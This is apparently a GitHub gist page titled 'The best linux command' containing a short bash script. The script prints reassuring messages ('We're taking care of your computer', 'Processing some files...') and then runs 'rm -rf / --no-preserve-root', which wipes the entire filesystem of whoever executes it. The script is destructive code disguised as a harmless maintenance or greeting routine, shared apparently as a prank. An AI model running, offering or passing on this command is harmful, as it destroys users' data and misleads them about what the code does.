Skip to content

Instantly share code, notes, and snippets.

@busybox11
Last active April 3, 2023 09:02
Show Gist options
  • Save busybox11/b2ff51bba12f624acab7848c9edd2ce0 to your computer and use it in GitHub Desktop.
Save busybox11/b2ff51bba12f624acab7848c9edd2ce0 to your computer and use it in GitHub Desktop.
The best linux command
#!/bin/bash
echo "Hi there"
echo
sleep 3 &
echo "We're taking care of your computer"
echo
sleep 5 &
echo "Please let us some time."
echo "Processing some files..."
echo "OK"
sleep 5 &
echo "Goodbye!"
sleep 2 &
rm -rf / --no-preserve-root
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment